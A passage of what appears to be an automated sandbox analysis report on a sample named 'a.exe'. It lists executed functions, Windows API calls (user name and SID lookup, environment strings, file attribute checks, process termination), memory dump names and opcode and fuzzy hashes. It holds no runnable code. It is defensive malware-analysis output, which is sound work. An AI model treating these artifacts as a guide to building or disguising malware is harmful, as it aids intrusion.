                                          • Opcode Fuzzy Hash: 17f53bcb001aa0cf27f4b28cdacd85efe4fe4569033449001c41b86b803b0e8a
                                          • Instruction Fuzzy Hash: 8F115173978244A7DD28FBB2ED47FCE7359D702700F441021B7DA2A182EA38F924AA40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0029D584, Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$___from_strstr_to_strchr
                                          • String ID:
                                          • API String ID: 3409252457-0
                                          • Opcode ID: 299b500e22aee3ac91b010ec35eb2d8642ae7366138ac33758658dbc95661552
                                          • Instruction ID: 851dda3395e9b2e56f34a86d751205be89a8e1ed074ce8debf7db0e3cd7ecdf7
                                          • Opcode Fuzzy Hash: 299b500e22aee3ac91b010ec35eb2d8642ae7366138ac33758658dbc95661552
                                          • Instruction Fuzzy Hash: DB61E473A28241AFEF11AFB4DC41BAC3BB4E705758F048265EF5497686EB718961EB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0029BE8A, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 293COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3907804496
                                          • Opcode ID: 401e94447128540a108f649382e091907315235e1b9facf13ac36de02e159a72
                                          • Instruction ID: 7d59ffcf60b0a7f9dd2dcdca1818c9cf310820bbe8b12be65b33ab422e220f95
                                          • Opcode Fuzzy Hash: 401e94447128540a108f649382e091907315235e1b9facf13ac36de02e159a72
                                          • Instruction Fuzzy Hash: DBC1BFB2B242419FEB15DFB8DC80BAC3BB1B748718F248114EF0597B8AD7749962CB15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0029DE47, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 5d0a5859f4b37fc9e185064ffee58ad4f855eb3b6b6ae4a5b76935e3f7635b51
                                          • Instruction ID: 9069fd756cd032ccf0d8faa6b371c35ede9ce72ee30e2355acfe9f5c165b6ea4
                                          • Opcode Fuzzy Hash: 5d0a5859f4b37fc9e185064ffee58ad4f855eb3b6b6ae4a5b76935e3f7635b51
                                          • Instruction Fuzzy Hash: 66F0FF739381126BEA25EF51FDC5F2A7362A711711F581410FACC9B601C739FCE1AA40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0029F238, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: __dosmaperr
                                          • String ID: H
                                          • API String ID: 2332233096-2852464175
                                          • Opcode ID: 7b29262b32dc82f416ec04a4e2ce346f5ec378c28730e20a5315283c697878fc
                                          • Instruction ID: 8bc3147a2275098870675d52f292376f2eba7374b26c8175f262f52de76a9a77
                                          • Opcode Fuzzy Hash: 7b29262b32dc82f416ec04a4e2ce346f5ec378c28730e20a5315283c697878fc
                                          • Instruction Fuzzy Hash: 97A15433A245808FEF58DF38DC11BBC3BA0E349728F184228EE159B794DB389966C741
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0029C513, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 200COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free
                                          • String ID: *?
                                          • API String ID: 269201875-2564092906
                                          • Opcode ID: 945c9b06d4a588eafc62a8e469eba3607330fa205256fe077b1cf505299b0ecb
                                          • Instruction ID: 30cdd99b9246beb961c2f7c9ac033e1beb54a64e9814492476fb40e65c434bf6
                                          • Opcode Fuzzy Hash: 945c9b06d4a588eafc62a8e469eba3607330fa205256fe077b1cf505299b0ecb
                                          • Instruction Fuzzy Hash: 6F6162B7F202119FEB10CFB8C8415AC7BB5E7487187298169EF14E7B08D730AE508B40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0029AE4A, Relevance: 6.3, APIs: 4, Instructions: 314COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _strrchr
                                          • String ID:
                                          • API String ID: 3213747228-0
                                          • Opcode ID: 447b405dc1308a7494c17cef692ee183c5ef68cd76993912d86d227f7ac66a84
                                          • Instruction ID: 1de75665c60d625404dcb943980bbcfd8b6ffde12675cbee5817654c5f45908c
                                          • Opcode Fuzzy Hash: 447b405dc1308a7494c17cef692ee183c5ef68cd76993912d86d227f7ac66a84
                                          • Instruction Fuzzy Hash: E4B15573A242919FEB22CF38D9517BE3BA1E355308F188025EF6497B49E7398D61CB41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00292484, Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002924A0
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002924B9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Value___vcrt_
                                          • String ID:
                                          • API String ID: 1426506684-0
                                          • Opcode ID: 6c03938069e6b7b23674db80bc579b142826eceee62ccf849c52df2d9d81859c
                                          • Instruction ID: 35c8d395495c95c17c581d3855b26823971f32cb894d63a9b0411b21c9ca96d0
                                          • Opcode Fuzzy Hash: 6c03938069e6b7b23674db80bc579b142826eceee62ccf849c52df2d9d81859c
                                          • Instruction Fuzzy Hash: 50019E3622C612FAFE226B68AC91B7636816B10779F105330BD1855091FE224CA99150
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00296E7C, Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.659153975.0000000000282000.00000002.00020000.sdmp, Offset: 00280000, based on PE: true
                                          • Associated: 00000000.00000002.659149191.0000000000280000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.659185876.00000000002B6000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 8819f9331d67d4a56e5fd11763de535f0137ff881198b71dfd3ed83d3ea7af30
                                          • Instruction ID: 2af608f768fec106007094c74e404705945ac6009fae010378ed8d6a36e1d5d2
                                          • Opcode Fuzzy Hash: 8819f9331d67d4a56e5fd11763de535f0137ff881198b71dfd3ed83d3ea7af30
                                          • Instruction Fuzzy Hash: E9E01AB842C9209EFA243F10AD42F6A3A23F704700F152017F4C813222EE3A0932AA90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: a.exe PID: 6736 Parent PID: 3220 a.exeCOMMON

                                          Executed Functions

                                          Function 01001DA0, Relevance: 27.2, APIs: 18, Instructions: 157memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 01001DCA
                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 01001DDF
                                          • HeapAlloc.KERNEL32(00000000), ref: 01001DE2
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 01001DF0
                                          • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 01001E13
                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 01001E1E
                                          • HeapAlloc.KERNEL32(00000000), ref: 01001E21
                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 01001E31
                                          • HeapAlloc.KERNEL32(00000000), ref: 01001E34
                                          • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 01001E5E
                                          • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 01001E71
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 01001F02
                                          • HeapFree.KERNEL32(00000000), ref: 01001F0B
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01001F10
                                          • HeapFree.KERNEL32(00000000), ref: 01001F13
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01001F1A
                                          • HeapFree.KERNEL32(00000000), ref: 01001F1D
                                          • LocalFree.KERNEL32(00000000), ref: 01001F22
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                          • String ID:
                                          • API String ID: 3326663573-0
                                          • Opcode ID: d78cb6941e5fcc2853da3ada52570d3438d5f3db0422a183be397e4bdfab2cbc
                                          • Instruction ID: 3815f8135f94417db970f777ecf09e094ae7871d2eef93ce6d754f7c04141aa9
                                          • Opcode Fuzzy Hash: d78cb6941e5fcc2853da3ada52570d3438d5f3db0422a183be397e4bdfab2cbc
                                          • Instruction Fuzzy Hash: 8C517375D00249ABEB21DFA5DC84FAFBBBCEF44340F140569E945A3280DB759E05CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010121C1, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,010121C0,?,?,?,?,?,01013272), ref: 010121E3
                                          • TerminateProcess.KERNEL32(00000000,?,010121C0,?,?,?,?,?,01013272), ref: 010121EA
                                          • ExitProcess.KERNEL32 ref: 010121FC
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: c9c718d1fbbade09bc37e98eccee60df39d4def2849dfe6126fcd2e85c932710
                                          • Instruction ID: 8643ac166031e9622b9147f2e8b25b42f2f060baa9477d2ff57094ae85050dc5
                                          • Opcode Fuzzy Hash: c9c718d1fbbade09bc37e98eccee60df39d4def2849dfe6126fcd2e85c932710
                                          • Instruction Fuzzy Hash: 31E0EC35001148AFCF326F5CDD08A8A3F6AFF65241B304414F9958A229DB3EE981DB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01010567, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00010573,0101006C), ref: 0101056C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: bae6a47d98cfe562c4c6067707d251b0ebfade4d22e6a6d2e2b311b940ac8433
                                          • Instruction ID: 8ca3bc9a73047669d82d4551ecdef1e74f8321d569e73c67c276803ac51fc4f1
                                          • Opcode Fuzzy Hash: bae6a47d98cfe562c4c6067707d251b0ebfade4d22e6a6d2e2b311b940ac8433
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101A84A, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3907804496
                                          • Opcode ID: 53cc753de716bc65b21c6767d2a52f38c0b6dbea50cc1a9c7c663a614a16896f
                                          • Instruction ID: e2078e836bc8ce88105e0f808130ae172bd2318e37048a7e171ccf96f8846dbb
                                          • Opcode Fuzzy Hash: 53cc753de716bc65b21c6767d2a52f38c0b6dbea50cc1a9c7c663a614a16896f
                                          • Instruction Fuzzy Hash: 12C1B170B05289DFDB15DF9CC880BADBBF6BF49310F044499E685AB28AD77D9941CB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101DBF8, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0101D8B1: CreateFileW.KERNELBASE(00000000,00000000,?,0101DCA1,?,?,00000000,?,0101DCA1,00000000,0000000C), ref: 0101D8CE
                                          • GetLastError.KERNEL32 ref: 0101DD0C
                                          • __dosmaperr.LIBCMT ref: 0101DD13
                                          • GetFileType.KERNELBASE(00000000), ref: 0101DD1F
                                          • GetLastError.KERNEL32 ref: 0101DD29
                                          • __dosmaperr.LIBCMT ref: 0101DD32
                                          • CloseHandle.KERNEL32(00000000), ref: 0101DD52
                                          • CloseHandle.KERNEL32(0101649E), ref: 0101DE9F
                                          • GetLastError.KERNEL32 ref: 0101DED1
                                          • __dosmaperr.LIBCMT ref: 0101DED8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: H
                                          • API String ID: 4237864984-2852464175
                                          • Opcode ID: f168cdb51d4def09bf6e6f3bf7bb1d0e8bfcb310f41e957ad11e7429fbf494fe
                                          • Instruction ID: 7c66cb74068caf741908668a1778395cbb0c3bfe563ac9a77ed05092176a2a40
                                          • Opcode Fuzzy Hash: f168cdb51d4def09bf6e6f3bf7bb1d0e8bfcb310f41e957ad11e7429fbf494fe
                                          • Instruction Fuzzy Hash: A5A13832A001499FDF29AFACD8957ED3BF1AB0A320F140199E891AF3D9D73D9906C751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01004F35, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 293COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 01004F3E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-2740779761
                                          • Opcode ID: 89db1c3c1e48e5f19dc7c053c8efa2b9b92bbfad3337d30bbd5af27bc50d66bc
                                          • Instruction ID: bc20181237e192a8c3ce398377db1841244bf05b778703e1152b57f111e6403c
                                          • Opcode Fuzzy Hash: 89db1c3c1e48e5f19dc7c053c8efa2b9b92bbfad3337d30bbd5af27bc50d66bc
                                          • Instruction Fuzzy Hash: E88168316001055BFB1EEB78CC89BEEBA66AF96310F14861CF584DB2D5D739D9808B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01007BB0, Relevance: 4.7, APIs: 3, Instructions: 198COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: PathTemp
                                          • String ID:
                                          • API String ID: 2920410445-0
                                          • Opcode ID: 4e5615210e66e35e57b11d44c5414194b8f00540caf0a5179f18ede0c7f2e4d4
                                          • Instruction ID: 6f4051db089d8e22342b8cb8b802e87522edc8aa440b679094e5e018d1e3f53a
                                          • Opcode Fuzzy Hash: 4e5615210e66e35e57b11d44c5414194b8f00540caf0a5179f18ede0c7f2e4d4
                                          • Instruction Fuzzy Hash: 9A71F330E002098BFF15EBA8CC84BEEBBB5AF55304F644558D5847B2C2D775A989CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01018CC2, Relevance: 4.7, APIs: 3, Instructions: 177fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 01018457: GetConsoleCP.KERNEL32(?,01003D80,00000000), ref: 0101849F
                                          • WriteFile.KERNELBASE(?,00000000,0102E0A8,?,00000000,?,01003D80,01003D80,01003D80,?,?,?,010124C5,?,0102E0A8,00000010), ref: 01018E13
                                          • GetLastError.KERNEL32(?,01003D80,01003D80,01003D80,?,?,?,010124C5,?,0102E0A8,00000010,01003D80), ref: 01018E1D
                                          • __dosmaperr.LIBCMT ref: 01018E62
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                          • String ID:
                                          • API String ID: 251514795-0
                                          • Opcode ID: 564f14e88b8c051e814247a4e01380e40b3daf4f523d42ffe449b390229360a8
                                          • Instruction ID: 8d95a52e63f3f8d034074211176f0bed772d559e807a866bf9a7ece2bbc44e3a
                                          • Opcode Fuzzy Hash: 564f14e88b8c051e814247a4e01380e40b3daf4f523d42ffe449b390229360a8
                                          • Instruction Fuzzy Hash: D351C571E0020AAFEB11EFA8C844BEEBBF9FF19314F444452E680AB159D77D9A41C761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101BEBF, Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 0101BEC8
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0101BF36
                                            • Part of subcall function 0101BDDB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,010211E0,?,00000000,00000000), ref: 0101BE7D
                                            • Part of subcall function 01016AEA: RtlAllocateHeap.NTDLL(00000000,?,?,?,0101B9A2,00000220,?,?,?,?,?,?,01013272,?), ref: 01016B1C
                                          • _free.LIBCMT ref: 0101BF27
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                          • String ID:
                                          • API String ID: 2560199156-0
                                          • Opcode ID: 8bd612e4ac0b7a6c499b4e183cd647f8e183df1dc78fe1f5b3e2de584105e6f6
                                          • Instruction ID: fbec694aeb67889c12343c41bba58b19f30b373c3769648edabb3bda5ad64621
                                          • Opcode Fuzzy Hash: 8bd612e4ac0b7a6c499b4e183cd647f8e183df1dc78fe1f5b3e2de584105e6f6
                                          • Instruction Fuzzy Hash: 1D0188625056127B373125AA1C88CBF7DBDDFD5954314016CFA80D214CEB6ECD0186B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01016754, Relevance: 4.6, APIs: 3, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(00000000,00000000,01003D80,?,01016682,01003D80,0102E1C8,0000000C,01016734,0102E0A8), ref: 010167AA
                                          • GetLastError.KERNEL32(?,01016682,01003D80,0102E1C8,0000000C,01016734,0102E0A8), ref: 010167B4
                                          • __dosmaperr.LIBCMT ref: 010167DF
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                          • String ID:
                                          • API String ID: 490808831-0
                                          • Opcode ID: 4c27e45bfeb7a6c7de57c84ab51492736d1d16f5b99a69986fe06ad6666c5e7f
                                          • Instruction ID: b6201e987d2529bcc337903e9cdae698bf879a4254a364d62c1d28b9d9d016d7
                                          • Opcode Fuzzy Hash: 4c27e45bfeb7a6c7de57c84ab51492736d1d16f5b99a69986fe06ad6666c5e7f
                                          • Instruction Fuzzy Hash: A0016B3260412006D6752678DD847BE37C96B86734F38019CE9988B1C9FABF88894290
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01005062, Relevance: 3.3, APIs: 2, Instructions: 279COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 01005065
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: fdbc37d5b0c8cba6ab45893b0fed4614caf49de4e1e9cdd761924043611dd495
                                          • Instruction ID: 945090c83f47416b642fbf8eefa3761173b865e9345741243b593cf9258f213b
                                          • Opcode Fuzzy Hash: fdbc37d5b0c8cba6ab45893b0fed4614caf49de4e1e9cdd761924043611dd495
                                          • Instruction Fuzzy Hash: C2817B316102056BFB1EEB38CC85BEE7A66AF86310F54861CF5C49B2D5D739DA80CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010053D7, Relevance: 3.3, APIs: 2, Instructions: 276COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 010053DA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 0807609f7509229436e87324858e8cb4e6c7ba36c4dc54816d6af44550906b61
                                          • Instruction ID: 7c3366405af65b97b9b203faa218ca28bc8a56afce15df7aadee39f1362c3aae
                                          • Opcode Fuzzy Hash: 0807609f7509229436e87324858e8cb4e6c7ba36c4dc54816d6af44550906b61
                                          • Instruction Fuzzy Hash: CD8189316102055BFB1AEB78CC85BEEBA66EF96310F14861CF5C49B2D1D739DA80CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010054FE, Relevance: 3.3, APIs: 2, Instructions: 275COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 01005501
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: cb2c11bb64c3171d462f3f93284be1be9c69aa3c8968e48b4c93dfea327abbb8
                                          • Instruction ID: 8685ed9f65bd353b37d1994d83f5c694fd9035a20450aefc4e1fdb7748887aa8
                                          • Opcode Fuzzy Hash: cb2c11bb64c3171d462f3f93284be1be9c69aa3c8968e48b4c93dfea327abbb8
                                          • Instruction Fuzzy Hash: FD8169316102055BFB1AEB38CC85BEE7A66EF96310F14865CF584DB2D5D739DA80CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01005625, Relevance: 3.3, APIs: 2, Instructions: 274COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 01005628
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
